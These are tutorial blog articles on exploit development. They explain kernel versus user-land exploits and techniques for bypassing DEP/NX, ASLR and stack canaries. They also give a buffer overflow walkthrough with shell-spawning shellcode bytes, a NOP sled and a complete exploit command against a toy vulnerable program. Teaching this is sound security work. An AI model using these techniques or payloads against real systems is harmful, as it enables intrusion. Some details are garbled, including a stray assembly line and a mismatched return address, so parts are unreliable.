kernel exploit Vs user land exploitation

Kernel exploits are used for privilege escalation, whereas user-land exploits aim to access a system and arbitrary execute a command. The privilege of the spawned shell or executed command totally depends to the privilege of the target vulnerable application and in a hardened environment it is minimal. If an administrator does not do his homework correctly and set the root credential for a vulnerable web server then the root privilege after successfully running an exploit against the web server is a bonus! On the other hand, the mere goal of a kernel exploit is privilege escalation. As a matter of fact, a kernel exploit is run after some sort of access to the system exists already, a remote kernel exploit is an exception though. For example an attacker may attack a vulnerable web server that is running on a limited user account using a buffer overflow exploit and receives a limited spawned shell. The attacker now wants to install a keylogger and since a keylogger is basically a driver the attacker should have the root privileges or at least the privilege to load a driver. To achieve that privilege, he needs to run a kernel exploit and elevate the privilege of the spawned shell.

Kernel vulnerability is not different than user-land vulnerability but the method of triggering operating system exploits is different! Kernel is composed of scheduler, memory manager, drivers and etc. A user-land application communicates with the operating system thorough system calls. Moreover a user-land program may communicate with a driver using IO calls. Kernels also communicate with the user through the hardware via drivers. For example, to connect to a webserver, a client should send a packet to the network card of the host. This packet arrives to the network card of the web server’s host and it is processed by the network driver which is kernel path. Except the network drivers, most of the vulnerable kernel paths are just accessible through a system call by a local program. Triggering exploits by a local program gives you some degree of control. For example bypassing ASLR and Non executable stacks is simple because you can place your shellcode in the executable and read its address!

Exploiting operating system kernel definitely introduces new challenges. Triggering kernel vulnerability is equal to tampering the operating system. Messing around with the operating system is not without extra costs; you should always have a recovery phase in your kernel exploits to remedy your mess. Furthermore leveraging kernel vulnerability needs more knowledge. There are lots of factors involved in determining the status of the operating system. Exploit writing for kernel cannot be successfully done without knowing the effects of other processes on the kernel and also the effect of your exploit on other processes. For example as you will see in the privilege escalation shellcode tutorial, one method of transferring the execution to your shellcode is modifying the system call table. Assume that your shellcode is placed in the user-land virtual addresses as part of your program executable. To execute the shellcode you update a system call to points to your shellcode. Now what happens if another process calls the system call even before your shellcode has a chance to recover the state of the system call table? The system probably crashes because other processes do not see the virtual addresses of your process and a critical page fault arises. To avoid this you probably want to modify the local descriptor tables entries, which is different for each process, or choosing an infrequent used system call instead of using a high demanded system call.

It should come as no surprise that remote kernel exploits are even more challenging. Not only you have the aforementioned challenges of local kernel exploit but also you face ASLR, non-executable stack and stack canaries protections. Because of all of these problems most people believe that arbitrary memory overwrite is the only exploitable vector in case of kernel remote exploits. It should be also mentioned that this type of vulnerability is also very common in drivers. For example UserSharedData in windows and Vsyscall page in Linux are perfect places to overwrite the shellcode. These places have fixed addresses and they have double mappings. Their mapping from a kernel path is writable so you don’t worry about being non-executable.

In kernel shellcode article you will see how a kernel exploit elevates privilege of a process.

The reference of this article like other kernel exploit materials in this website is A Guide to Kernel Exploitation book.

Published in Kernel Exploitation

Bypass DEP and NX bit | Bypass ASLR | Bypass Stack Canary and Cookie

Buffer overflows are not anymore the most popular vulnerabilities. The vulnerability analysis tools aid the developers to identify buffer overflow vulnerabilities (at least the obvious ones) at the time of development and this significantly had reduced from the number of buffer overflow vulnerabilities. Moreover protections such as Non-Executable Stacks, Address Space Layout Randomization and Stack Canaries have made the life miserable for the buffer overflow exploit writers even when they found a buffer overflow. Nonetheless buffer overflows are still a threat and in some situations are exploitable and can lead to the old school arbitrary code execution.

Learning the methods to bypass each of the aforementioned security mechanisms not only gives you an insight as a exploit developer to leverage a buffer overflow vulnerability in case it is exploitable but also guides you not to waste your time identifying buffer overflows in case they are not exploitable. As a developer point of the view also, you understand the importance of a security mechanism.

 Non-Executable Stack (NX bit) | Data Execution Prevention (DEP)

In case you still haven’t read my introduction to the Buffer overflow exploit development I strongly encourage you to do so before reading the rest of this article. In that article we placed our shellcode as part of the buffer on the stack. Well of course that was possible because we were working on an old operating system with executable stack. This is a requisite since in case of Non-Executable stack the CPU does not execute instructions on the stack memory.

Non-Executable stacks are feasible by the NX bit of the architecture. Starting from the last versions of Intel x86-32 there has been a NX bit around which if enabled the codes on the stack cannot be executed. It took some time before operating systems make use of this bit. For example Microsoft offered Data Execution Prevention (DEP) feature in the last service packs of windows XP that enables the NX bit for the stack memory. Shipping out the x86-64 platforms, mostly all operating systems have activated Non-Executable stack by means of page table entries.

Address Space Layout Randomization (ASLR) 

Before ASLR, you could easily predict the address of your shellcode almost precisely. You saw how we did that using a debugger in my introduction to the Buffer overflow exploit development. To understand the ASLR and the difference it caused you need to know how a process address space is managed. Nearly all operating systems support the paging and paging brings virtual address space isolation. This means every process sees the whole memory as its own (or at least part of the memory except the kernel part). None of the processes can reference other process’s memory. This is possible because every process has its own page table and when a process is scheduled for execution its page table is loaded into the MMU. Process address space isolation made the life very easy for compilers. That is, compilers start from a virtual address and use them in the executable of the program. Considering our example, we used this logic to predict the address of our shellcode. Operating system dependent factors are still involved in the program address space determination. For example the environment variables change the starting address of executing program variables on the stack. However by use of NOP seldom the effect of OS factors can easily be neutralized.

By the advance of ASLR, program virtual addresses were not fixed anymore and we could not hard code the address of our shellcode to the exploit. If ASLR is activated for a program, in each run the addresses change and you don’t know the address of your shellcode at the time of injecting it to the buffer. ASLR is an operating system feature. Knowing if your operating system of choice has ASLR feature is as easy as running a program multiple times and examining its addresses with a debugger. ASLR operates in two modes. In fact it depends on your compilation that in which mode your program operates. In the first mode of ASLR just the stack and data segments’ address are randomized and the code or text segment addresses are fixed. In the second mode which is the default mode for the network library and sensitive programs all of the segments’ addresses are randomized. Knowing in which mode your program of choice operates is very important as you see in the bypassing ASLR protection section.

Stack Canaries | Cookies

Stack Canary is a compiler feature not the operating system or the architecture. As you have seen in my introduction to the Buffer overflow exploit development our final goal to leverage a buffer overflow was to overwrite the return address on the stack. The stack canary provides a method to identify Instruction pointer (IP) overwrite and stopping the execution. The logic is very simple a 4 byte data known as stack canary or stack cookie is placed just before the return address on the stack and a check is performed before the function returns to see if it’s been overwritten. If it’s been overwritten, the return address is probably overwritten too and the execution should be stopped before the control flow goes to the shellcode.

Compilers place a piece of code or a function at the beginning of each function that adjusts the stack and place the stack canary on it. They also add a piece of code at the end of each function to check the current stack canary value against the initialized one and stop the execution if any attacks found. Of course this affects the performance so some compilers just activate the stack canary for sensitive functions (those that have at least one variable or one input). Below is an example of a function which will be called at the beginning of a stack-canary-activated function (the code is taken from a guide to the kernel exploitation book):

__SEH_prolog4_GS:

 push offset _except_handler4

 push dword ptr fs:[0]

 mov eax,dword ptr [esp+10h]

 mov dword ptr [esp+10h],ebp

 lea ebp,[esp+10h]

 sub esp,eax

 push ebx

 push esi

 push edi

 mov eax,dword ptr [__security_cookie]

 xor dword ptr [ebp-4],eax

 xor eax,ebp

 mov dword ptr [ebp-1Ch],eax

 eax

 mov dword ptr [ebp-18h],esp

 push dword ptr [ebp-8]

 mov eax,dword ptr [ebp-4]

 mov dword ptr [ebp-4],0FFFFFFFEh

 mov dword ptr [ebp-8],eax

 lea eax,[ebp-10h]

 mov dword ptr fs:[00000000h],eax

 ret

 

This code also adjusts the exception registration record on the stack for a windows 2003 32 bit.

Bypassing Anti-Exploitation protections

Now that you know what are the buffer overflow protections and where they come from, you are ready to learn how to bypass them. We first introduce the method particular to each protection and then review the approach to circumvent them when they are at place together.

Bypass Non-Executable Stack protection | NX bit

Bypass Non-Executable Stack protection in local exploitation

In local kernel exploits you can easily bypass the NX bit security protection. You save your shellcode as part of your executable that exploits the vulnerability and you redirect the execution to the address of the shellcode. The success of this method again depends on your architecture. On CISC architectures kernel address space is above the user land address space you so can address the userland memory in the kernel. When you save your shellcode as part of the executable and you trigger a kernel exploit, the shellcode is accessible from the kernel vulnerable path.

Bypass Non-Executable Stack protection in remote exploitation

Non-Executable stacks as mentioned prevent you from injecting your shellcode to the vulnerable stack buffer. One of the solutions to this problem is return-to-lib approach. In this approach instead of running the code to spawn the shell we redirect the execution to a shared library which does the same. One of the traditional functions to redirect to is the “system” function in the libc library. Of course the success of this solution depends to the architecture. On x86-32 architectures, parameters are passed on the stack and since you have control over the stack so you can put the parameters to the system function on the stack and call the system function by replacing the return address with its address. On x86-64 architectures however, parameters are passed using registers so this solution is not an option. But an enhanced version of this method named code borrowing can be acquired. In code borrowing you redirect the execution to some pop instructions that loads the parameters on the stack to the registers. Then when your registers are ready you redirect the execution to the function. For redirection the last pop should be terminated with Ret.

Shared library developers learned to remove functions like system function so you cannot easily redirect execution to a critical libc function because it probably does not exist. Exploit writers on the other hand invented another successor of this method: Return Oriented Programming. In this approach instead of redirecting the call just once, you make up the stack such that several redirections take place. Each redirection is terminated with a “ret” instruction and in each redirection part of the shellcode is executed. When the execution arrives to the “ret”, the next redirection address is popped from the stack, the place we have control. The addresses for redirection points to the places in the text segment of the executable or shared libraries. This method works on the x86-32 architecture. By combining this method with code borrowing you can also exploit x86-64 architectures.

Bypassing Address Space Layout Randomization | ASLR

As we mentioned in the Address Space Layout Randomization section there are two modes of ASLR. In the position independent code mode, the code, data and the stack segments are randomized. But in the second mode just the stack and data segment addresses are randomized. Of course the ladder is easier to bypass. The only thing you need is to find a JMP ESP instruction in the code (.text) segment of the executable and redirect the control flow there. It may sound that JMP ESP is an odd instruction to exist in a normal executable but no worries! JMP ESP opcode is 0xffe4 and since x86 does not need addresses to be aligned in memory you can jump to the middle of an instruction which has this pattern. .text segment addresses are not randomized so the address you find to redirect to is fixed. After redirection the control goes back to the stack and the only thing you need is to place the shell code after the return address on the stack. If the overflow is not that big you can just place a “short Jump” instruction after the return address on the stack to redirect the control to the addresses below the return address. Since “short Jump” needs a relative position you just need to know the offset of the shellcode to the return address and insert the twos complement of the negative of that offset after the return address.

If the code is compiled with the position independent code option then you have to look the executable shared libraries for fixed addresses. For example fast system calls like Vsyscall was added to x86-64 linux kernels before 3.1. These fast system calls like time(), gettimeofday() and getcpu() are fixed to static addresses. On windows also Process Information Block (PEB) data structure used to be in a fixed address. Using the ROP method to bypass DEP discussed in the previous section you can assemble a series of usefull gadgets (several instructions ended with a ret instruction) in these fixed addresses and make up your shellcode.

There also might be weaknesses in the ASLR implementation that allows you brute forcing the exploit. Brute forcing is possible when the randomization is somehow predicted i.e. the range of randomized addresses are known somehow. In those cases just one success is enough to compromise the system.

Bypassing Stack Canaries | Cookies

I open this discussion by the most obvious solution that is revealing the stack canary and forger it in your exploit. Theoretically this solution may seem simple but there are considerations. First the canary isn’t going to be predictable nor is it a fixed value. However in some cases it is proved to be the same for a process during its life cycle. This means if you have already some sort of control over the running process you may be able to reveal the canary value and forger it. This is very useful for a local exploit and specifically for a kernel local exploit. For remote exploits however, it doesn’t seem feasible unless you have also an arbitrary read vulnerability which allows you to fingerprint the memory and use the enumerated canary value for a subsequent stack buffer overflow exploit

Stack canaries used to be easy to bypass especially on Microsoft operating systems before the NT 6 kernel. For example on windows XP or 2003 (all of the service packs) you could easily bypass the stack canary checking with the aid of Structured Exception Handling (SEH) mechanism. SEH was a method to handle the exceptions which Microsoft introduced in its C++ version. C++ compiled applications on windows operating systems before NT 6 place Exception registration records on the stack. When an exception raises the address of first Exception registration record is fetched and the control is passed to it. If a buffer overflow is big enough, the attacker can overwrite Exception registration record on the stack and continue the overflow until an exception arises (for example when the overflow goes to addresses that are not mapped). The Exception handler pops the exception record (manipulated by the attacker) from the stack and the control goes there. Because of the exception and the fact the function execution is not finished the code to check the canary is never called and you redirected the execution to wherever you want using the manipulated exception registration record.

With the advance of NT version 6 kernels, SHE overwrite does not work anymore since the exception registration records are no longer placed on the stack. In those situations the simplest antidote against stack canary is not to touch the canary or the return address. In this method you hunt an important variable on the stack and do not touch the canary. You might be able to arbitrary execute a command if there is a function pointer on the stack. If not you must look for a sensitive variable on the stack which its manipulation gains some benefits. Another solution is to turn a buffer overflow to an indexed based overflow and overwrite the return address without touching the canary. Of course this method does not work always since not any overflow can be turned to an index based overwrite.

I close the discussion of stack canaries by a talk on symmetric multi processor (SMP) systems. As you may know on these systems several processors are executing instructions concurrently. This feature opens a new exploitation vector for us. Consider your target is a process that has multiple threads and these threads are scheduled to run each on one of the CPUs. In this situation if you manage to cause a large overflow that exceeds the current page and overwrites the next page you may have a chance to execute an arbitrary command. Here the next page may contain bytes that are being executed by another process so you may have a chance to get your shellcode executed before the first thread triggers the canary overwrite fault!   

Bypassing multi layered | defense in depth protections

In a defense in depth strategy a combination of aforementioned protections is at place. Normally you see both ASLR and DEP (Non executable stack) in the current Microsoft, Linux and Mac operating systems although there are still programs that do not support these features. The latest approach to bypass these protections is to use ROP. On x86-64 systems you may also need code borrowing because function parameters are passed in registers on those architectures. If a program is compiled by stack canary option then it really depends on your case. If the buffer overflow can be turned to an index based overflow then you have a chance to overwrite the return address without touching the stack cookie.

Conclusion

Stack overflows are not as common and popular as several years ago. The prevention methods from one side and the protection mechanisms from the other side have made the exploitation of buffer overflows very hard. Now that you’re familiar with the architecture, operating system and compiler barriers in the way of exploitation (and also antidotes) you can secure your software products with open eyes. On the other hand if you’re a hacker or penetration tester you should have learned that hacking is an art and it requires creativity; there may be an easy solution around the corner in your case waiting for your creativity! That being said, buffer overflows are still a threat but do not invest your time more than required finding stack overflows in cases where the bars are too high!

Published in Exploit development
Tuesday, 23 June 2015 00:00

off by one buffer overflow

off by one buffer overflow

Off-by-one vulnerability is a type of buffer overflow that allows you to only modify one byte. It is a result of miscalculation of the buffer length. Below is an example of off-by-one vulnerability in C language:

int get_user(char *user)

{

    char buf[1024];

 

    if(strlen(user) > sizeof(buf))

        die("error: user string too long\n");

 

    strcpy(buf, user);

 

    ...

}

The art of software security assessment, Listing 5-3

Here the strlen function return the size of string but does not consider the null termination character. The strcpy copies the user in buf variable and writes the null byte to the adjacent variable. If compiler does not use any padding the adjacent variable is EBP.

Sometimes because of compiler padding and reordering of variables, exploiting Off-by-one vulnerabilities is not possible but sometimes we can execute arbitrary codes in certain situations although in stack overflow off-by-one vulnerabilities we have no control on ESP. Depending on the compiler ordering of variables you may also have the opportunity to overwrite a specific variable that is vital for an application

Exploiting Off-by-one buffer overflow vulnerability

Exploiting an off-by-one vulnerability really depends to the place of the vulnerable buffer and also other buffers the user has control on. If the variable is just above the EBP (the variable is the first variable after EBP on the stack) the Off-by-one allows us to change the least significant byte of the EBP. This provides us the ability to manipulate the ESP of previous function since in some situations after the function returns the EBP is restored to ESP. Being allowed to alter the stack pointer of a function explicitly can provide us the opportunity to manipulate the EIP. If we change the least significant byte of the EBP so that it points to a buffer controllable by us, we can make up the buffer so that it contains a custom address to be restored as the saved EIP. This custom address can point to another user controllable buffer that contains the shellcode. Bam, after the second function returns, which its ESP points to altered EBP, our arbitrary code is executed.

 off by one stack buffer overflow exploit

Published in Exploit development

Buffer overflow exploit development

Buffer overflow exploits leverage a special type of bug in software where the buffer to be read or written is not properly managed. Normally an input data larger than the size of the buffer must lead to a fault or crash. However the Art of exploit development is to create a crafted data that not only does it not cause a program crash but also leads to an arbitrary command execution. Although a hacking experience such the one you had in my  Remote Hacking with Metasploit article proves how devastating can a buffer overflow exploit be, you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorial and even books out there teaching the basic concepts of buffer overflow exploits. A good example is this presentation regarding basic concepts of buffer overflow from syssec. I strongly recommend reading this power point presentation first and then read the rest of this exploit development tutorial. Here I am assuming that you have read this or you have a basic understanding of what buffer overflow is and why it can lead to an arbitrary code execution.

Which programming languages should I know for exploit development?

Generally for identifying a vast portion of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, especially you should be comfortable by the pointer concept. Rather than C, a deep knowledge of assembly is also required. Assembly knowledge also is required for Shellcode development (don’t worry you get what shellcode is at the end of this article). The exploit writing itself does not need any programming language although developing exploit with metasploit is strongly recommended. Eventually a scripting language such as Python or Perl can buy you a lot of time for fuzzing to detect the buffer overflow vulnerability and then to write a code snippet to automatically run the exploit.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C but here I give you a basic example of an unmanaged buffer which can lead to a buffer overflow exploit:

 int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The Art of Exploitation - overflow_example.c

Here the buffer_two is 8 bytes but no size checking is performed before copying the arg1 to it. This means you can input 16 or even more bytes to cause a buffer overflow. If you compile and run this small code you see the effect of a buffer flow. In this case the buffer_one is overwritten by extra bytes. Surprise?! Don’t be, if you had read the basic concepts behind buffer overflow you know that the stack grows down and this means any subsequent variables (in this case buffer_two) in memory are saved before their precedent (buffer_one). If you input a larger string you see that the program crashes. Usually you get a segmentation fault error because of the overflow. The goal of exploit development (for buffer overflow specifically) is to leverage this bug and recieve a shell or command prompt instead of a segmentation fault error or program crash! How fun it will be, right? Be patient we will get to that point. But first let’s review the requirements for exploit development.

Exploit experimentation operating system requirement

10 years ago, exploit writing was much easier than what it is right now. That’s because that time most of the current protections and security mechanisms to prevent a buffer overflow did not exist. If you’re thirsty to know how a simple vulnerable code can be exploited on modern operating systems such as Win 7 or Windows 8 you must be patient and read the articles in the Exploitation category especially Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept download an old OS such as Ubunto 7.04 (Fiesty Fawn) that has little to no protection mechanisms. On such operating systems you can see the feasibility of exploitation and learn the basic exploit development concepts and then gradually upgrade your knowledge to hack on modern operating systems.

Why Buffer overflows can lead to an arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions and depending on the algorithm of the program, the Main function executes other functions. “Main” function is the entry point of an application and when you click an executable, the statements in the Main function are executed one by one. A statement can be a call to a function and the called function can call another function in itself. This function calling mechanism has no limit so how does operating system keep track of the instructions to execute?! I mean after a function execution is done how operating system should know what is the next instruction after the called function? Well, a fast method for operating system to keep such data is to keep the next instruction address exactly where it stores the variables and function’s parameters. That place is the stack and again to see its structure I recommend read this presentation. The “next instruction address” after execution of a function is stored on top of all the function variables. This means any buffer vulnerable to buffer overflow in a function is beneath the saved Extended Instruction Pointer (EIP). In other words an overflow on any variable in a function can potentially overwrite the next instruction address or saved EIP on the stack.

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example you see that extending the input finally leads to the program crash. When the crash happens, you have overwritten the EIP. But for a successful exploitation you need to know exactly how many bytes are needed to overwrite the EIP. Well I introduce two methods here. First using a debugger and second by experimentation.

Finding the exact bytes to overwrite the EIP using debugger

In this method we know the value of EIP and we just want to see how far it is located from our buffer. Let’s modify the buffer overflow example a little bit:

#include <stdio.h>

#include <string.h>

void copy_buffer(char buffer[],char argv[]) {

                strcpy(buffer, argv);

}

 

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %d bytes into buffer_two\n\n",  strlen(argv[1]));

                copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The only difference is that we used copy_buffer function to copy the program arguments. Here we know that the next instruction after the copy_buffer is line 41. So after this function, the execution flow should return to the address of this instruction. By setting a breakpoint on copy_buffer line in Main and examining its address we are able to locate it in copy_buffer function. The simplest method is to set another breakpoint on line 9 just before  copy_buffer function returns. Then we examine the stack (64 bytes or more) and see where the return address value and our input placed. That’s it the distance between these two addresses show the exact required bytes to overwrite the saved EIP.

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate the task of running the program with different length inputs and see when it crashes. A python script can easily do such a task but here I show you a linux BASH script to do so:

 

$ for i in $(seq 1 100)

> do

> echo Trying offset $i

> ./a.out $(perl –e “print ‘AAAA’x$i“)

> done

 

Whenever you see the first segmentation fault you find the exact offset.

After finding the exact offset by repeating AAAA offset times you can successfully overwrite the EIP by the 0x41414141 value.

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the EIP by a custom valid address means redirecting the execution to a code you want. Immediately you may ask redirecting execution where? You’re writing to a buffer, remember? So not just you’re overflowing the buffer to overwrite the saved EIP on the stack but also you write your code to that buffer. Thus the only barrier is to find the address of that buffer you overwrite so that you will be able to write this address on the saved EIP and bam, the program executes the code as input! This code is known as SHELLCODE.

What is NOP slide?

Finding the address of the buffer where you inject the SHELLCODE is not that easy. There are a lot of factors involved that can change the address of the buffer in different situations. Moreover the address should exactly points to the beginning of the SHELLCODE. So if any factor changes the address even by one byte, the SHELLCODE is not executed completely and the program crashes. To minimize the complexity of finding the exact return address (the address of the buffer) we place NOP instructions at the beginning of the SHELLCODE. When CPU sees a NOP instruction it simple does nothing. Thus if any factors change, the address points to somewhere between the NOP instructions (known as NOP slide) and the CPU executes NOPs one after the other until it reaches the SHELLCODE. The layout of our exploit is as shown in Figure 1:

layout of a buffer overflow exploit

Figure 1

 How to find the return address that points to the SHELLCODE?

The quick answer is using a debugger to find the address of the buffer that holds the input. When you audit an open source code or a simple example like the one in this tutorial you can easily find the address by using the variable name in the debugger.

  1. In Linux, gdb is the best and this task is as easy as attaching to the process:
gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

 

  1. Process Id can be retrieved using ps command and the output file is whatever name you give while compiling with gcc. After attaching to the process you can get the address of the buffer using this command:
x/x [VARIABLE-NAME]

 

In windows, it is even easier using WinDbg or Immunity debugger:

  1. You must first place your .pdb file in a location and point to it using this menu:

File-->Symbol File path

  1. And then you attach to the process using this menu:

File-->Attach to process

  1. And then view the variable address using:

View-->Watch

  1. Here you type the name of your variable.

If you do not have the symbol file and the source code, don’t worry! You can search for the input and retrieve the address of the beginning of the buffer. For example in WinDbg with Mona.py installed finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

SHELLCODE

Figure 2

These bytes if executed will spawn a bash shell for you. But in order to be executed you should inject them by the preceding NOP sled to the program. One important factor for a successful exploitation is the vulnerable buffer length. You can overflow and overwrite the EIP even with a 8 bytes buffer such as the one in our buffer overflow example though it needs a lot of experience and knowledge. We want to input our SHELLCODE + NOP Sled to the buffer so our buffer should be at least that big. Because of this we modify our buffer overflow example like this:

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[250];

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

}

 

Now our vulnerable buffer is big enough that we can input a data that contains our NOP sled + SHELLCODE + Repeated Return Address

Building the exploit

Ok, so far you saw a vulnerable program to buffer overflow exploit. Then you learned that any vulnerable buffer allows you to overwrite the return address on the stack. Afterward you learned that you can purposely overwrite the return address so that it points to a SHELLCODE you input to the buffer. Finally you’ve learned how to find the address of the SHELLCODE at the buffer and add some NOPs to increase precision. Now it is time to see how we build an exploit using this info.

  1. In Linux we build the NOP sled like this:
$(perl -e 'print "\x90"x200')

 

This builds 200 NOP consecutive instructions for us.

  1. Then we build our SHELLCODE like this:
 Export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"

"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"

"\xe1\xcd\x80")

 

The string is hexadecimal representation of binary codes to spawn a bash shell for us.

  1. Finally assuming the address of vulnerable buffer is 0xbffff5c0, we repeat the address of 0xbffff624 10 times. That’s right we do not repeat the buffer address but we repeat 0xbffff5c0 + 100! Because 100 bytes after it we are in the middle of NOP instructions and it is a safe guess even if the buffer address is altered by a factor. Why 10 times? That depends to the buffer length (here 250), NOP Sled size and the offset of the buffer to the saved EIP. Remember that the goal is to overflow the buffer and overwrite the EIP so if 10 does not work for you once again you can run the BASH script to find the offset and calculate the length of Repeated Return Addresses:
$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Did you notice? The address is in reverse order! That’s because an Intel 32 bit architecture like the Ubunto 7.04 (Fiesty Fawn) is little endian and this means the least significant bit is placed at the higher address.

  1. Finally our exploit can be run:
./a.out $(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

Or the exploit can be saved in a local environment variable like this:

Export EXPLOIT=$(perl -e 'print "\x90"x200') $(echo $SHELLCODE)$(perl -e 'print "\xc0\xf5\xff\xbf"x10')

 

You can also save the exploit to a file:

Echo $EXPLOIT > example_exploit

 

 Or you can run the exploit in future by:

./a.out $(echo $EXPLOIT)

 

Or:

./a.out $(cat example_exploit)

 

 

Published in Exploit development
Advanced Programming Concepts
News Letter

Subscribe our Email News Letter to get Instant Update at anytime